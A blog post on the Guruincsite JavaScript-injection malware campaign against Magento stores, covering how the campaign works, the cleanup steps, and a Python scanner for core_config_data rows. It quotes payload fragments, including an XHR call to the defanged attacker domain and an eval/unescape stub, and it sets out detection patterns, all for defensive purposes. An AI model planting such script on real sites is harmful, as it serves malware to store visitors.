Your Magento Website got Hacked?

Guruincsite.com is a JavaScript-injection malware campaign that has affected thousands of Magento-based stores. The guruincsite.com domain serves the iframes through which the attackers load malicious scripts into compromised Magento sites. Google has already blacklisted seven thousand sites attacked by this malware. The campaign has been observed since October 15th: visitors to an infected store are redirected to guruincsite.com, where the malicious script exploits a Flash vulnerability without any action by the user, silently delivering malware.

How does the Guruincsite malware attack sites?

The malware exploits a vulnerability in a third-party extension to inject JavaScript into the Magento database, from where it is served to every visitor of the site. It can also gain a foothold through an administrative account, whether by way of a weak password or by phishing the credentials. Because the malware gives the attackers administrative access, it is very important to check for fake admin accounts. Google has identified the domains involved and categorized the online stores affected by the hack. The malicious code is injected into the design/footer/absolute_footer setting by writing to the core_config_data table. Every merchant should scan the whole database to find out whether their Magento store is affected. Both obfuscated and non-obfuscated versions of the malware have been reported.

Follow these Steps

Every Magento merchant should follow best practices to ensure the security of their website. Even if previous patches have already been applied, the website should still be checked for guruincsite.com. Some best practices for securing the site are:

  • Check your website for guruincsite.com, for other malware, and for security vulnerabilities in your files that could lead to future attacks, for example with the scanners at magereport.com or sucuri.net.
  • Find and remove the malicious script that has been injected into your site, then submit an unblock request to Google.
  • Review all admin users in your system, checking each account by username, and remove the accounts you are not actively using.
  • Apply all available patches in order to close every exploitable vulnerability.

Removing the Malware

Since the malware is attached to the footer, go to the admin panel, navigate to System >> Configuration >> Design >> Footer >> Miscellaneous HTML, and remove the malicious code. You can recognize the injection by the presence of code such as function LCWEHH(XHFER1){XHFER1=XHFER1, and of a line that reads xhr.open('GET', 'http;//guruincsite,com/1,php'.

  • Delete, as soon as possible, any unknown admin user that you did not create, because it could have been added by the malware.
  • Once you are sure that all malicious code has been removed, submit a reconsideration request in Google Webmaster Tools to notify Google that your site is now clean.
  • Get your Magento store patched with the latest Magento security patches.
  • Change all login credentials and update your website to the latest Magento version.
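The database scan recommended above and the indicator strings given in the removal steps can be combined into one check. The following Python script is an added example, not code from this post or from Magento: it inspects core_config_data rows (exported as config_id, path, value) for those indicators and, as an assumed heuristic that the post does not give, for common JavaScript obfuscation constructs; the sample rows are constructed.

```python
import re

# Where the post says the script is injected, and strings that identify the
# non-obfuscated payload. All patterns are case-insensitive.
INJECTED_PATH = "design/footer/absolute_footer"
INDICATORS = {
    "guruincsite domain": re.compile(r"guruincsite", re.I),
    "LCWEHH loader function": re.compile(r"function\s+LCWEHH\s*\(", re.I),
    "xhr GET to remote 1.php": re.compile(r"xhr\.open\s*\(\s*['\"]GET['\"].*?1[.,]php", re.I | re.S),
    # Constructs typical of obfuscated JavaScript (assumed heuristic, not from the post).
    "obfuscated script construct": re.compile(r"eval\s*\(|unescape\s*\(|fromCharCode|\\x[0-9a-f]{2}", re.I),
}

def scan_config_rows(rows):
    """Inspect core_config_data rows given as dicts with config_id, path and value.

    Returns one finding per suspicious row: the matched indicator names plus a
    'review_script_tag' flag when the footer setting holds any <script> at all.
    Legitimate tracking snippets live there too, so that flag means "look", not "delete".
    """
    findings = []
    for row in rows:
        value = row.get("value") or ""
        hits = [name for name, pat in INDICATORS.items() if pat.search(value)]
        review = row["path"] == INJECTED_PATH and re.search(r"<script\b", value, re.I) is not None
        if hits or review:
            findings.append({"config_id": row["config_id"], "path": row["path"],
                             "hits": hits, "review_script_tag": review})
    return findings

# Constructed sample rows, shaped like the output of
# SELECT config_id, path, value FROM core_config_data. The URL is kept defanged as in the post.
SAMPLE_ROWS = [
    {"config_id": 1, "path": "design/header/logo_alt", "value": "Example Store"},
    {"config_id": 2, "path": "design/footer/copyright", "value": "&copy; 2015 Example Store"},
    {"config_id": 3, "path": "design/footer/absolute_footer",
     "value": "<script>function LCWEHH(XHFER1){XHFER1=XHFER1;var xhr=new XMLHttpRequest();"
              "xhr.open('GET','http;//guruincsite,com/1,php');xhr.send();}</script>"},
    {"config_id": 4, "path": "design/footer/absolute_footer",
     "value": "<script>eval(unescape('%66%75%6e%63%74%69%6f%6e'));</script>"},
]

if __name__ == "__main__":
    for finding in scan_config_rows(SAMPLE_ROWS):
        print(finding)
```

Run it against a real export of the table rather than the constructed rows; a row flagged only by review_script_tag should be read before anything is deleted.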

by inerun